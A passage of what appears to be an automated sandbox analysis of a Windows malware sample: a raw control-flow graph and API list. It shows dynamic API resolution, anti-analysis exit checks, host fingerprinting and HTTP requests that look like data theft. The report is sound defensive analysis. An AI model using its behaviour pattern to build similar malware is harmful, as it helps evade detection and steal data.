14132->14133 14134 7345c0 2 API calls 14133->14134 14135 733b04 14134->14135 14136 7345c0 2 API calls 14135->14136 14137 733b1d 14136->14137 14138 7345c0 2 API calls 14137->14138 14139 733b36 14138->14139 14140 7345c0 2 API calls 14139->14140 14141 733b4f 14140->14141 14142 7345c0 2 API calls 14141->14142 14143 733b68 14142->14143 14144 7345c0 2 API calls 14143->14144 14145 733b81 14144->14145 14146 7345c0 2 API calls 14145->14146 14147 733b9a 14146->14147 14148 7345c0 2 API calls 14147->14148 14149 733bb3 14148->14149 14150 7345c0 2 API calls 14149->14150 14151 733bcc 14150->14151 14152 7345c0 2 API calls 14151->14152 
14153 733be5 14152->14153 14154 7345c0 2 API calls 14153->14154 14155 733bfe 14154->14155 14156 7345c0 2 API calls 14155->14156 14157 733c17 14156->14157 14158 7345c0 2 API calls 14157->14158 14159 733c30 14158->14159 14160 7345c0 2 API calls 14159->14160 14161 733c49 14160->14161 14162 7345c0 2 API calls 14161->14162 14163 733c62 14162->14163 14164 7345c0 2 API calls 14163->14164 14165 733c7b 14164->14165 14166 7345c0 2 API calls 14165->14166 14167 733c94 14166->14167 14168 7345c0 2 API calls 14167->14168 14169 733cad 14168->14169 14170 7345c0 2 API calls 14169->14170 14171 733cc6 14170->14171 14172 7345c0 2 API calls 14171->14172 14173 733cdf 14172->14173 14174 7345c0 2 API calls 14173->14174 14175 733cf8 14174->14175 14176 7345c0 2 API calls 14175->14176 14177 733d11 14176->14177 14178 7345c0 2 API calls 14177->14178 14179 733d2a 14178->14179 14180 7345c0 2 API calls 14179->14180 14181 733d43 14180->14181 14182 7345c0 2 API calls 14181->14182 14183 733d5c 14182->14183 14184 7345c0 2 API calls 14183->14184 14185 733d75 14184->14185 14186 7345c0 2 API calls 14185->14186 14187 733d8e 14186->14187 14188 7345c0 2 API calls 14187->14188 14189 733da7 14188->14189 14190 7345c0 2 API calls 14189->14190 14191 733dc0 14190->14191 14192 7345c0 2 API calls 14191->14192 14193 733dd9 14192->14193 14194 7345c0 2 API calls 14193->14194 14195 733df2 14194->14195 14196 7345c0 2 API calls 14195->14196 14197 733e0b 14196->14197 14198 7345c0 2 API calls 14197->14198 14199 733e24 14198->14199 14200 7345c0 2 API calls 14199->14200 14201 733e3d 14200->14201 14202 7345c0 2 API calls 14201->14202 14203 733e56 14202->14203 14204 7345c0 2 API calls 14203->14204 14205 733e6f 14204->14205 14206 7345c0 2 API calls 14205->14206 14207 733e88 14206->14207 14208 7345c0 2 API calls 14207->14208 14209 733ea1 14208->14209 14210 7345c0 2 API calls 14209->14210 14211 733eba 14210->14211 14212 7345c0 2 API calls 14211->14212 14213 733ed3 14212->14213 14214 7345c0 2 API calls 14213->14214 14215 733eec 
14214->14215 14216 7345c0 2 API calls 14215->14216 14217 733f05 14216->14217 14218 7345c0 2 API calls 14217->14218 14219 733f1e 14218->14219 14220 7345c0 2 API calls 14219->14220 14221 733f37 14220->14221 14222 7345c0 2 API calls 14221->14222 14223 733f50 14222->14223 14224 7345c0 2 API calls 14223->14224 14225 733f69 14224->14225 14226 7345c0 2 API calls 14225->14226 14227 733f82 14226->14227 14228 7345c0 2 API calls 14227->14228 14229 733f9b 14228->14229 14230 7345c0 2 API calls 14229->14230 14231 733fb4 14230->14231 14232 7345c0 2 API calls 14231->14232 14233 733fcd 14232->14233 14234 7345c0 2 API calls 14233->14234 14235 733fe6 14234->14235 14236 7345c0 2 API calls 14235->14236 14237 733fff 14236->14237 14238 7345c0 2 API calls 14237->14238 14239 734018 14238->14239 14240 7345c0 2 API calls 14239->14240 14241 734031 14240->14241 14242 7345c0 2 API calls 14241->14242 14243 73404a 14242->14243 14244 7345c0 2 API calls 14243->14244 14245 734063 14244->14245 14246 7345c0 2 API calls 14245->14246 14247 73407c 14246->14247 14248 7345c0 2 API calls 14247->14248 14249 734095 14248->14249 14250 7345c0 2 API calls 14249->14250 14251 7340ae 14250->14251 14252 7345c0 2 API calls 14251->14252 14253 7340c7 14252->14253 14254 7345c0 2 API calls 14253->14254 14255 7340e0 14254->14255 14256 7345c0 2 API calls 14255->14256 14257 7340f9 14256->14257 14258 7345c0 2 API calls 14257->14258 14259 734112 14258->14259 14260 7345c0 2 API calls 14259->14260 14261 73412b 14260->14261 14262 7345c0 2 API calls 14261->14262 14263 734144 14262->14263 14264 7345c0 2 API calls 14263->14264 14265 73415d 14264->14265 14266 7345c0 2 API calls 14265->14266 14267 734176 14266->14267 14268 7345c0 2 API calls 14267->14268 14269 73418f 14268->14269 14270 7345c0 2 API calls 14269->14270 14271 7341a8 14270->14271 14272 7345c0 2 API calls 14271->14272 14273 7341c1 14272->14273 14274 7345c0 2 API calls 14273->14274 14275 7341da 14274->14275 14276 7345c0 2 API calls 14275->14276 14277 7341f3 14276->14277 
14278 7345c0 2 API calls 14277->14278 14279 73420c 14278->14279 14280 7345c0 2 API calls 14279->14280 14281 734225 14280->14281 14282 7345c0 2 API calls 14281->14282 14283 73423e 14282->14283 14284 7345c0 2 API calls 14283->14284 14285 734257 14284->14285 14286 7345c0 2 API calls 14285->14286 14287 734270 14286->14287 14288 7345c0 2 API calls 14287->14288 14289 734289 14288->14289 14290 7345c0 2 API calls 14289->14290 14291 7342a2 14290->14291 14292 7345c0 2 API calls 14291->14292 14293 7342bb 14292->14293 14294 7345c0 2 API calls 14293->14294 14295 7342d4 14294->14295 14296 7345c0 2 API calls 14295->14296 14297 7342ed 14296->14297 14298 7345c0 2 API calls 14297->14298 14299 734306 14298->14299 14300 7345c0 2 API calls 14299->14300 14301 73431f 14300->14301 14302 7345c0 2 API calls 14301->14302 14303 734338 14302->14303 14304 7345c0 2 API calls 14303->14304 14305 734351 14304->14305 14306 7345c0 2 API calls 14305->14306 14307 73436a 14306->14307 14308 7345c0 2 API calls 14307->14308 14309 734383 14308->14309 14310 7345c0 2 API calls 14309->14310 14311 73439c 14310->14311 14312 7345c0 2 API calls 14311->14312 14313 7343b5 14312->14313 14314 7345c0 2 API calls 14313->14314 14315 7343ce 14314->14315 14316 7345c0 2 API calls 14315->14316 14317 7343e7 14316->14317 14318 7345c0 2 API calls 14317->14318 14319 734400 14318->14319 14320 7345c0 2 API calls 14319->14320 14321 734419 14320->14321 14322 7345c0 2 API calls 14321->14322 14323 734432 14322->14323 14324 7345c0 2 API calls 14323->14324 14325 73444b 14324->14325 14326 7345c0 2 API calls 14325->14326 14327 734464 14326->14327 14328 7345c0 2 API calls 14327->14328 14329 73447d 14328->14329 14330 7345c0 2 API calls 14329->14330 14331 734496 14330->14331 14332 7345c0 2 API calls 14331->14332 14333 7344af 14332->14333 14334 7345c0 2 API calls 14333->14334 14335 7344c8 14334->14335 14336 7345c0 2 API calls 14335->14336 14337 7344e1 14336->14337 14338 7345c0 2 API calls 14337->14338 14339 7344fa 14338->14339 14340 7345c0 2 
API calls 14339->14340 14341 734513 14340->14341 14342 7345c0 2 API calls 14341->14342 14343 73452c 14342->14343 14344 7345c0 2 API calls 14343->14344 14345 734545 14344->14345 14346 7345c0 2 API calls 14345->14346 14347 73455e 14346->14347 14348 7345c0 2 API calls 14347->14348 14349 734577 14348->14349 14350 7345c0 2 API calls 14349->14350 14351 734590 14350->14351 14352 7345c0 2 API calls 14351->14352 14353 7345a9 14352->14353 14354 749c10 14353->14354 14355 74a036 8 API calls 14354->14355 14356 749c20 43 API calls 14354->14356 14357 74a146 14355->14357 14358 74a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14355->14358 14356->14355 14359 74a216 14357->14359 14360 74a153 8 API calls 14357->14360 14358->14357 14361 74a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14359->14361 14362 74a298 14359->14362 14360->14359 14361->14362 14363 74a2a5 6 API calls 14362->14363 14364 74a337 14362->14364 14363->14364 14365 74a344 9 API calls 14364->14365 14366 74a41f 14364->14366 14365->14366 14367 74a4a2 14366->14367 14368 74a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14366->14368 14369 74a4dc 14367->14369 14370 74a4ab GetProcAddress GetProcAddress 14367->14370 14368->14367 14371 74a515 14369->14371 14372 74a4e5 GetProcAddress GetProcAddress 14369->14372 14370->14369 14373 74a612 14371->14373 14374 74a522 10 API calls 14371->14374 14372->14371 14375 74a67d 14373->14375 14376 74a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14373->14376 14374->14373 14377 74a686 GetProcAddress 14375->14377 14378 74a69e 14375->14378 14376->14375 14377->14378 14379 74a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14378->14379 14380 745ca3 14378->14380 14379->14380 14381 731590 14380->14381 15503 731670 14381->15503 14384 74a7a0 lstrcpy 14385 7315b5 14384->14385 14386 74a7a0 lstrcpy 14385->14386 14387 7315c7 14386->14387 14388 74a7a0 lstrcpy 14387->14388 14389 
7315d9 14388->14389 14390 74a7a0 lstrcpy 14389->14390 14391 731663 14390->14391 14392 745510 14391->14392 14393 745521 14392->14393 14394 74a820 2 API calls 14393->14394 14395 74552e 14394->14395 14396 74a820 2 API calls 14395->14396 14397 74553b 14396->14397 14398 74a820 2 API calls 14397->14398 14399 745548 14398->14399 14400 74a740 lstrcpy 14399->14400 14401 745555 14400->14401 14402 74a740 lstrcpy 14401->14402 14403 745562 14402->14403 14404 74a740 lstrcpy 14403->14404 14405 74556f 14404->14405 14406 74a740 lstrcpy 14405->14406 14425 74557c 14406->14425 14407 731590 lstrcpy 14407->14425 14408 7452c0 25 API calls 14408->14425 14409 745643 StrCmpCA 14409->14425 14410 7456a0 StrCmpCA 14411 7457dc 14410->14411 14410->14425 14412 74a8a0 lstrcpy 14411->14412 14413 7457e8 14412->14413 14416 74a820 2 API calls 14413->14416 14414 74a740 lstrcpy 14414->14425 14415 74a820 lstrlen lstrcpy 14415->14425 14418 7457f6 14416->14418 14417 745856 StrCmpCA 14419 745991 14417->14419 14417->14425 14420 74a820 2 API calls 14418->14420 14422 74a8a0 lstrcpy 14419->14422 14421 745805 14420->14421 14423 731670 lstrcpy 14421->14423 14424 74599d 14422->14424 14445 745811 14423->14445 14426 74a820 2 API calls 14424->14426 14425->14407 14425->14408 14425->14409 14425->14410 14425->14414 14425->14415 14425->14417 14427 745a0b StrCmpCA 14425->14427 14438 7451f0 20 API calls 14425->14438 14441 74578a StrCmpCA 14425->14441 14443 74593f StrCmpCA 14425->14443 14444 74a7a0 lstrcpy 14425->14444 14446 74a8a0 lstrcpy 14425->14446 14428 7459ab 14426->14428 14430 745a16 Sleep 14427->14430 14431 745a28 14427->14431 14429 74a820 2 API calls 14428->14429 14432 7459ba 14429->14432 14430->14425 14433 74a8a0 lstrcpy 14431->14433 14434 731670 lstrcpy 14432->14434 14435 745a34 14433->14435 14434->14445 14436 74a820 2 API calls 14435->14436 14437 745a43 14436->14437 14439 74a820 2 API calls 14437->14439 14438->14425 14440 745a52 14439->14440 14442 731670 lstrcpy 14440->14442 14441->14425 14442->14445 
14443->14425 14444->14425 14445->13499 14446->14425 14448 747553 GetVolumeInformationA 14447->14448 14449 74754c 14447->14449 14451 747591 14448->14451 14449->14448 14450 7475fc GetProcessHeap RtlAllocateHeap 14452 747628 wsprintfA 14450->14452 14453 747619 14450->14453 14451->14450 14455 74a740 lstrcpy 14452->14455 14454 74a740 lstrcpy 14453->14454 14456 745da7 14454->14456 14455->14456 14456->13520 14458 74a7a0 lstrcpy 14457->14458 14459 734899 14458->14459 15512 7347b0 14459->15512 14461 7348a5 14462 74a740 lstrcpy 14461->14462 14463 7348d7 14462->14463 14464 74a740 lstrcpy 14463->14464 14465 7348e4 14464->14465 14466 74a740 lstrcpy 14465->14466 14467 7348f1 14466->14467 14468 74a740 lstrcpy 14467->14468 14469 7348fe 14468->14469 14470 74a740 lstrcpy 14469->14470 14471 73490b InternetOpenA StrCmpCA 14470->14471 14472 734944 14471->14472 14473 734955 14472->14473 14474 734ecb InternetCloseHandle 14472->14474 15523 748b60 14473->15523 14476 734ee8 14474->14476 15518 739ac0 CryptStringToBinaryA 14476->15518 14477 734963 15531 74a920 14477->15531 14481 734976 14482 74a8a0 lstrcpy 14481->14482 14486 73497f 14482->14486 14483 74a820 2 API calls 14484 734f05 14483->14484 14485 74a9b0 4 API calls 14484->14485 14487 734f1b 14485->14487 14491 74a9b0 4 API calls 14486->14491 14489 74a8a0 lstrcpy 14487->14489 14488 734f27 ctype 14490 74a7a0 lstrcpy 14488->14490 14489->14488 14503 734f57 14490->14503 14492 7349a9 14491->14492 14493 74a8a0 lstrcpy 14492->14493 14494 7349b2 14493->14494 14495 74a9b0 4 API calls 14494->14495 14496 7349d1 14495->14496 14497 74a8a0 lstrcpy 14496->14497 14498 7349da 14497->14498 14499 74a920 3 API calls 14498->14499 14500 7349f8 14499->14500 14501 74a8a0 lstrcpy 14500->14501 14502 734a01 14501->14502 14504 74a9b0 4 API calls 14502->14504 14503->13523 14505 734a20 14504->14505 14506 74a8a0 lstrcpy 14505->14506 14507 734a29 14506->14507 14508 74a9b0 4 API calls 14507->14508 14509 734a48 14508->14509 14510 74a8a0 lstrcpy 14509->14510 14511 734a51 
14510->14511 14512 74a9b0 4 API calls 14511->14512 14513 734a7d 14512->14513 14514 74a920 3 API calls 14513->14514 14515 734a84 14514->14515 14516 74a8a0 lstrcpy 14515->14516 14517 734a8d 14516->14517 14518 734aa3 InternetConnectA 14517->14518 14518->14474 14519 734ad3 HttpOpenRequestA 14518->14519 14521 734b28 14519->14521 14522 734ebe InternetCloseHandle 14519->14522 14523 74a9b0 4 API calls 14521->14523 14522->14474 14524 734b3c 14523->14524 14525 74a8a0 lstrcpy 14524->14525 14526 734b45 14525->14526 14527 74a920 3 API calls 14526->14527 14528 734b63 14527->14528 14529 74a8a0 lstrcpy 14528->14529 14530 734b6c 14529->14530 14531 74a9b0 4 API calls 14530->14531 14532 734b8b 14531->14532 14533 74a8a0 lstrcpy 14532->14533 14534 734b94 14533->14534 14535 74a9b0 4 API calls 14534->14535 14536 734bb5 14535->14536 14537 74a8a0 lstrcpy 14536->14537 14538 734bbe 14537->14538 14539 74a9b0 4 API calls 14538->14539 14540 734bde 14539->14540 14541 74a8a0 lstrcpy 14540->14541 14542 734be7 14541->14542 14543 74a9b0 4 API calls 14542->14543 14544 734c06 14543->14544 14545 74a8a0 lstrcpy 14544->14545 14546 734c0f 14545->14546 14547 74a920 3 API calls 14546->14547 14548 734c2d 14547->14548 14549 74a8a0 lstrcpy 14548->14549 14550 734c36 14549->14550 14551 74a9b0 4 API calls 14550->14551 14552 734c55 14551->14552 14553 74a8a0 lstrcpy 14552->14553 14554 734c5e 14553->14554 14555 74a9b0 4 API calls 14554->14555 14556 734c7d 14555->14556 14557 74a8a0 lstrcpy 14556->14557 14558 734c86 14557->14558 14559 74a920 3 API calls 14558->14559 14560 734ca4 14559->14560 14561 74a8a0 lstrcpy 14560->14561 14562 734cad 14561->14562 14563 74a9b0 4 API calls 14562->14563 14564 734ccc 14563->14564 14565 74a8a0 lstrcpy 14564->14565 14566 734cd5 14565->14566 14567 74a9b0 4 API calls 14566->14567 14568 734cf6 14567->14568 14569 74a8a0 lstrcpy 14568->14569 14570 734cff 14569->14570 14571 74a9b0 4 API calls 14570->14571 14572 734d1f 14571->14572 14573 74a8a0 lstrcpy 14572->14573 14574 734d28 14573->14574 
14575 74a9b0 4 API calls 14574->14575 14576 734d47 14575->14576 14577 74a8a0 lstrcpy 14576->14577 14578 734d50 14577->14578 14579 74a920 3 API calls 14578->14579 14580 734d6e 14579->14580 14581 74a8a0 lstrcpy 14580->14581 14582 734d77 14581->14582 14583 74a740 lstrcpy 14582->14583 14584 734d92 14583->14584 14585 74a920 3 API calls 14584->14585 14586 734db3 14585->14586 14587 74a920 3 API calls 14586->14587 14588 734dba 14587->14588 14589 74a8a0 lstrcpy 14588->14589 14590 734dc6 14589->14590 14591 734de7 lstrlen 14590->14591 14592 734dfa 14591->14592 14593 734e03 lstrlen 14592->14593 15537 74aad0 14593->15537 14595 734e13 HttpSendRequestA 14596 734e32 InternetReadFile 14595->14596 14597 734e67 InternetCloseHandle 14596->14597 14602 734e5e 14596->14602 14600 74a800 14597->14600 14599 74a9b0 4 API calls 14599->14602 14600->14522 14601 74a8a0 lstrcpy 14601->14602 14602->14596 14602->14597 14602->14599 14602->14601 15539 74aad0 14603->15539 14605 7417c4 StrCmpCA 14606 7417cf ExitProcess 14605->14606 14608 7417d7 14605->14608 14607 7419c2 14607->13525 14608->14607 14609 741970 StrCmpCA 14608->14609 14610 7418f1 StrCmpCA 14608->14610 14611 741951 StrCmpCA 14608->14611 14612 741932 StrCmpCA 14608->14612 14613 741913 StrCmpCA 14608->14613 14614 74185d StrCmpCA 14608->14614 14615 74187f StrCmpCA 14608->14615 14616 7418ad StrCmpCA 14608->14616 14617 7418cf StrCmpCA 14608->14617 14618 74a820 lstrlen lstrcpy 14608->14618 14609->14608 14610->14608 14611->14608 14612->14608 14613->14608 14614->14608 14615->14608 14616->14608 14617->14608 14618->14608 14620 74a7a0 lstrcpy 14619->14620 14621 735979 14620->14621 14622 7347b0 2 API calls 14621->14622 14623 735985 14622->14623 14624 74a740 lstrcpy 14623->14624 14625 7359ba 14624->14625 14626 74a740 lstrcpy 14625->14626 14627 7359c7 14626->14627 14628 74a740 lstrcpy 14627->14628 14629 7359d4 14628->14629 14630 74a740 lstrcpy 14629->14630 14631 7359e1 14630->14631 14632 74a740 lstrcpy 14631->14632 14633 7359ee InternetOpenA StrCmpCA 
14632->14633 14634 735a1d 14633->14634 14635 735fc3 InternetCloseHandle 14634->14635 14637 748b60 3 API calls 14634->14637 14636 735fe0 14635->14636 14639 739ac0 4 API calls 14636->14639 14638 735a3c 14637->14638 14640 74a920 3 API calls 14638->14640 14641 735fe6 14639->14641 14642 735a4f 14640->14642 14644 74a820 2 API calls 14641->14644 14647 73601f ctype 14641->14647 14643 74a8a0 lstrcpy 14642->14643 14648 735a58 14643->14648 14645 735ffd 14644->14645 14646 74a9b0 4 API calls 14645->14646 14649 736013 14646->14649 14650 74a7a0 lstrcpy 14647->14650 14652 74a9b0 4 API calls 14648->14652 14651 74a8a0 lstrcpy 14649->14651 14661 73604f 14650->14661 14651->14647 14653 735a82 14652->14653 14654 74a8a0 lstrcpy 14653->14654 14655 735a8b 14654->14655 14656 74a9b0 4 API calls 14655->14656 14657 735aaa 14656->14657 14658 74a8a0 lstrcpy 14657->14658 14659 735ab3 14658->14659 14660 74a920 3 API calls 14659->14660 14662 735ad1 14660->14662 14661->13531 14663 74a8a0 lstrcpy 14662->14663 14664 735ada 14663->14664 14665 74a9b0 4 API calls 14664->14665 14666 735af9 14665->14666 14667 74a8a0 lstrcpy 14666->14667 14668 735b02 14667->14668 14669 74a9b0 4 API calls 14668->14669 14670 735b21 14669->14670 14671 74a8a0 lstrcpy 14670->14671 14672 735b2a 14671->14672 14673 74a9b0 4 API calls 14672->14673 14674 735b56 14673->14674 14675 74a920 3 API calls 14674->14675 14676 735b5d 14675->14676 14677 74a8a0 lstrcpy 14676->14677 14678 735b66 14677->14678 14679 735b7c InternetConnectA 14678->14679 14679->14635 14680 735bac HttpOpenRequestA 14679->14680 14682 735fb6 InternetCloseHandle 14680->14682 14683 735c0b 14680->14683 14682->14635 14684 74a9b0 4 API calls 14683->14684 14685 735c1f 14684->14685 14686 74a8a0 lstrcpy 14685->14686 14687 735c28 14686->14687 14688 74a920 3 API calls 14687->14688 14689 735c46 14688->14689 14690 74a8a0 lstrcpy 14689->14690 14691 735c4f 14690->14691 14692 74a9b0 4 API calls 14691->14692 14693 735c6e 14692->14693 14694 74a8a0 lstrcpy 14693->14694 14695 735c77 
14694->14695 14696 74a9b0 4 API calls 14695->14696 14697 735c98 14696->14697 14698 74a8a0 lstrcpy 14697->14698 14699 735ca1 14698->14699 14700 74a9b0 4 API calls 14699->14700 14701 735cc1 14700->14701 14702 74a8a0 lstrcpy 14701->14702 14703 735cca 14702->14703 14704 74a9b0 4 API calls 14703->14704 14705 735ce9 14704->14705 14706 74a8a0 lstrcpy 14705->14706 14707 735cf2 14706->14707 14708 74a920 3 API calls 14707->14708 14709 735d10 14708->14709 14710 74a8a0 lstrcpy 14709->14710 14711 735d19 14710->14711 14712 74a9b0 4 API calls 14711->14712 14713 735d38 14712->14713 14714 74a8a0 lstrcpy 14713->14714 14715 735d41 14714->14715 14716 74a9b0 4 API calls 14715->14716 14717 735d60 14716->14717 14718 74a8a0 lstrcpy 14717->14718 14719 735d69 14718->14719 14720 74a920 3 API calls 14719->14720 14721 735d87 14720->14721 14722 74a8a0 lstrcpy 14721->14722 14723 735d90 14722->14723 14724 74a9b0 4 API calls 14723->14724 14725 735daf 14724->14725 14726 74a8a0 lstrcpy 14725->14726 14727 735db8 14726->14727 14728 74a9b0 4 API calls 14727->14728 14729 735dd9 14728->14729 14730 74a8a0 lstrcpy 14729->14730 14731 735de2 14730->14731 14732 74a9b0 4 API calls 14731->14732 14733 735e02 14732->14733 14734 74a8a0 lstrcpy 14733->14734 14735 735e0b 14734->14735 14736 74a9b0 4 API calls 14735->14736 14737 735e2a 14736->14737 14738 74a8a0 lstrcpy 14737->14738 14739 735e33 14738->14739 14740 74a920 3 API calls 14739->14740 14741 735e54 14740->14741 14742 74a8a0 lstrcpy 14741->14742 14743 735e5d 14742->14743 14744 735e70 lstrlen 14743->14744 15540 74aad0 14744->15540 14746 735e81 lstrlen GetProcessHeap RtlAllocateHeap 15541 74aad0 14746->15541 14748 735eae lstrlen 14749 735ebe 14748->14749 14750 735ed7 lstrlen 14749->14750 14751 735ee7 14750->14751 14752 735ef0 lstrlen 14751->14752 14753 735f04 14752->14753 14754 735f1a lstrlen 14753->14754 15542 74aad0 14754->15542 14756 735f2a HttpSendRequestA 14757 735f35 InternetReadFile 14756->14757 14758 735f6a InternetCloseHandle 14757->14758 14762 735f61 
14757->14762 14758->14682 14760 74a9b0 4 API calls 14760->14762 14761 74a8a0 lstrcpy 14761->14762 14762->14757 14762->14758 14762->14760 14762->14761 14765 741077 14763->14765 14764 741151 14764->13533 14765->14764 14766 74a820 lstrlen lstrcpy 14765->14766 14766->14765 14772 740db7 14767->14772 14768 740f17 14768->13541 14769 740ea4 StrCmpCA 14769->14772 14770 740e27 StrCmpCA 14770->14772 14771 740e67 StrCmpCA 14771->14772 14772->14768 14772->14769 14772->14770 14772->14771 14773 74a820 lstrlen lstrcpy 14772->14773 14773->14772 14775 740f67 14774->14775 14776 740fb2 StrCmpCA 14775->14776 14777 741044 14775->14777 14778 74a820 lstrlen lstrcpy 14775->14778 14776->14775 14777->13549 14778->14775 14780 74a740 lstrcpy 14779->14780 14781 741a26 14780->14781 14782 74a9b0 4 API calls 14781->14782 14783 741a37 14782->14783 14784 74a8a0 lstrcpy 14783->14784 14785 741a40 14784->14785 14786 74a9b0 4 API calls 14785->14786 14787 741a5b 14786->14787 14788 74a8a0 lstrcpy 14787->14788 14789 741a64 14788->14789 14790 74a9b0 4 API calls 14789->14790 14791 741a7d 14790->14791 14792 74a8a0 lstrcpy 14791->14792 14793 741a86 14792->14793 14794 74a9b0 4 API calls 14793->14794 14795 741aa1 14794->14795 14796 74a8a0 lstrcpy 14795->14796 14797 741aaa 14796->14797 14798 74a9b0 4 API calls 14797->14798 14799 741ac3 14798->14799 14800 74a8a0 lstrcpy 14799->14800 14801 741acc 14800->14801 14802 74a9b0 4 API calls 14801->14802 14803 741ae7 14802->14803 14804 74a8a0 lstrcpy 14803->14804 14805 741af0 14804->14805 14806 74a9b0 4 API calls 14805->14806 14807 741b09 14806->14807 14808 74a8a0 lstrcpy 14807->14808 14809 741b12 14808->14809 14810 74a9b0 4 API calls 14809->14810 14811 741b2d 14810->14811 14812 74a8a0 lstrcpy 14811->14812 14813 741b36 14812->14813 14814 74a9b0 4 API calls 14813->14814 14815 741b4f 14814->14815 14816 74a8a0 lstrcpy 14815->14816 14817 741b58 14816->14817 14818 74a9b0 4 API calls 14817->14818 14819 741b76 14818->14819 14820 74a8a0 lstrcpy 14819->14820 14821 741b7f 
14820->14821 14822 747500 6 API calls 14821->14822 14823 741b96 14822->14823 14824 74a920 3 API calls 14823->14824 14825 741ba9 14824->14825 14826 74a8a0 lstrcpy 14825->14826 14827 741bb2 14826->14827 14828 74a9b0 4 API calls 14827->14828 14829 741bdc 14828->14829 14830 74a8a0 lstrcpy 14829->14830 14831 741be5 14830->14831 14832 74a9b0 4 API calls 14831->14832 14833 741c05 14832->14833 14834 74a8a0 lstrcpy 14833->14834 14835 741c0e 14834->14835 15543 747690 GetProcessHeap RtlAllocateHeap 14835->15543 14838 74a9b0 4 API calls 14839 741c2e 14838->14839 14840 74a8a0 lstrcpy 14839->14840 14841 741c37 14840->14841 14842 74a9b0 4 API calls 14841->14842 14843 741c56 14842->14843 14844 74a8a0 lstrcpy 14843->14844 14845 741c5f 14844->14845 14846 74a9b0 4 API calls 14845->14846 14847 741c80 14846->14847 14848 74a8a0 lstrcpy 14847->14848 14849 741c89 14848->14849 15550 7477c0 GetCurrentProcess IsWow64Process 14849->15550 14852 74a9b0 4 API calls 14853 741ca9 14852->14853 14854 74a8a0 lstrcpy 14853->14854 14855 741cb2 14854->14855 14856 74a9b0 4 API calls 14855->14856 14857 741cd1 14856->14857 14858 74a8a0 lstrcpy 14857->14858 14859 741cda 14858->14859 14860 74a9b0 4 API calls 14859->14860 14861 741cfb 14860->14861 14862 74a8a0 lstrcpy 14861->14862 14863 741d04 14862->14863 14864 747850 3 API calls 14863->14864 14865 741d14 14864->14865 14866 74a9b0 4 API calls 14865->14866 14867 741d24 14866->14867 14868 74a8a0 lstrcpy 14867->14868 14869 741d2d 14868->14869 14870 74a9b0 4 API calls 14869->14870 14871 741d4c 14870->14871 14872 74a8a0 lstrcpy 14871->14872 14873 741d55 14872->14873 14874 74a9b0 4 API calls 14873->14874 14875 741d75 14874->14875 14876 74a8a0 lstrcpy 14875->14876 14877 741d7e 14876->14877 14878 7478e0 3 API calls 14877->14878 14879 741d8e 14878->14879 14880 74a9b0 4 API calls 14879->14880 14881 741d9e 14880->14881 14882 74a8a0 lstrcpy 14881->14882 14883 741da7 14882->14883 14884 74a9b0 4 API calls 14883->14884 14885 741dc6 14884->14885 14886 74a8a0 lstrcpy 

                      Control-flow Graph

                      APIs
                      • GetProcAddress.KERNEL32(75900000,013E0750), ref: 007498A1
                      • GetProcAddress.KERNEL32(75900000,013E0798), ref: 007498BA
                      • GetProcAddress.KERNEL32(75900000,013E0618), ref: 007498D2
                      • GetProcAddress.KERNEL32(75900000,013E0630), ref: 007498EA
                      • GetProcAddress.KERNEL32(75900000,013E0558), ref: 00749903
                      • GetProcAddress.KERNEL32(75900000,013E8940), ref: 0074991B
                      • GetProcAddress.KERNEL32(75900000,013D66A0), ref: 00749933
                      • GetProcAddress.KERNEL32(75900000,013D6720), ref: 0074994C
                      • GetProcAddress.KERNEL32(75900000,013E0810), ref: 00749964
                      • GetProcAddress.KERNEL32(75900000,013E07B0), ref: 0074997C
                      • GetProcAddress.KERNEL32(75900000,013E0570), ref: 00749995
                      • GetProcAddress.KERNEL32(75900000,013E07C8), ref: 007499AD
                      • GetProcAddress.KERNEL32(75900000,013D68A0), ref: 007499C5
                      • GetProcAddress.KERNEL32(75900000,013E07F8), ref: 007499DE
                      • GetProcAddress.KERNEL32(75900000,013E07E0), ref: 007499F6
                      • GetProcAddress.KERNEL32(75900000,013D6980), ref: 00749A0E
                      • GetProcAddress.KERNEL32(75900000,013E05A0), ref: 00749A27
                      • GetProcAddress.KERNEL32(75900000,013E08E8), ref: 00749A3F
                      • GetProcAddress.KERNEL32(75900000,013D69E0), ref: 00749A57
                      • GetProcAddress.KERNEL32(75900000,013E0888), ref: 00749A70
                      • GetProcAddress.KERNEL32(75900000,013D66E0), ref: 00749A88
                      • LoadLibraryA.KERNEL32(013E0918,?,00746A00), ref: 00749A9A
                      • LoadLibraryA.KERNEL32(013E0900,?,00746A00), ref: 00749AAB
                      • LoadLibraryA.KERNEL32(013E08A0,?,00746A00), ref: 00749ABD
                      • LoadLibraryA.KERNEL32(013E0870,?,00746A00), ref: 00749ACF
                      • LoadLibraryA.KERNEL32(013E08B8,?,00746A00), ref: 00749AE0
                      • GetProcAddress.KERNEL32(75070000,013E0858), ref: 00749B02
                      • GetProcAddress.KERNEL32(75FD0000,013E08D0), ref: 00749B23
                      • GetProcAddress.KERNEL32(75FD0000,013E8CE8), ref: 00749B3B
                      • GetProcAddress.KERNEL32(75A50000,013E8D60), ref: 00749B5D
                      • GetProcAddress.KERNEL32(74E50000,013D6900), ref: 00749B7E
                      • GetProcAddress.KERNEL32(76E80000,013E8840), ref: 00749B9F
                      • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00749BB6
                      Strings
                      • NtQueryInformationProcess, xrefs: 00749BAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: NtQueryInformationProcess
                      • API String ID: 2238633743-2781105232
                      • Opcode ID: 16f3a19a90fe5e752a9d1c44e1e979b3cf32036954799e9b25c7340cc4a75a35
                      • Instruction ID: 6383a1bc5514ee6f439ef5f8b09a4e6b0de778a4e1fd888e881c067a08f67548
                      • Opcode Fuzzy Hash: 16f3a19a90fe5e752a9d1c44e1e979b3cf32036954799e9b25c7340cc4a75a35
                      • Instruction Fuzzy Hash: 8DA12DB792C2409FD348DFA8ED8999E37F9F7C8701B04451AA61D83264E73998C1EB53

                      Control-flow Graph

                      APIs
